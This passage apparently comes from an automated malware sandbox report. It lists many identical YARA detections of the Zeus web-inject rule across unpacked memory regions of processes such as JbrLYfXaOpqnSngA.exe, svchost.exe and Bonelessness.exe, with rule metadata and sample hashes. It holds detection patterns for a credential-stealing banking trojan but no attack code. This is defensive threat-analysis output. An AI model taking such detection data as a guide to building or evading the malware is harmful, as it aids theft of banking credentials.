      Source: 16.2.JbrLYfXaOpqnSngA.exe.2e42000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 16.2.JbrLYfXaOpqnSngA.exe.2e42000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 37.2.JbrLYfXaOpqnSngA.exe.27f0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 13.2.JbrLYfXaOpqnSngA.exe.a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.2.svchost.exe.2d83c00.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.3a80000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0.3.Bonelessness.exe.86d460.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.3c60000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.37.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0.2.Bonelessness.exe.407000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.24.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0.3.Bonelessness.exe.86e060.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0.2.Bonelessness.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 39.2.JbrLYfXaOpqnSngA.exe.2940000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.2.svchost.exe.407000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 23.2.JbrLYfXaOpqnSngA.exe.c40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 29.2.JbrLYfXaOpqnSngA.exe.3012000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 5.2.JbrLYfXaOpqnSngA.exe.e42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 39.2.JbrLYfXaOpqnSngA.exe.e42000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 37.2.JbrLYfXaOpqnSngA.exe.2652000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 33.2.JbrLYfXaOpqnSngA.exe.2962000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 27.2.JbrLYfXaOpqnSngA.exe.2342000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 23.2.JbrLYfXaOpqnSngA.exe.c40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0.2.Bonelessness.exe.406400.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 29.2.JbrLYfXaOpqnSngA.exe.32c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 19.2.JbrLYfXaOpqnSngA.exe.2d82000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 13.2.JbrLYfXaOpqnSngA.exe.9a2000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0.2.Bonelessness.exe.407000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.44.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 31.2.JbrLYfXaOpqnSngA.exe.8b0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.2606000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 39.2.JbrLYfXaOpqnSngA.exe.e42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
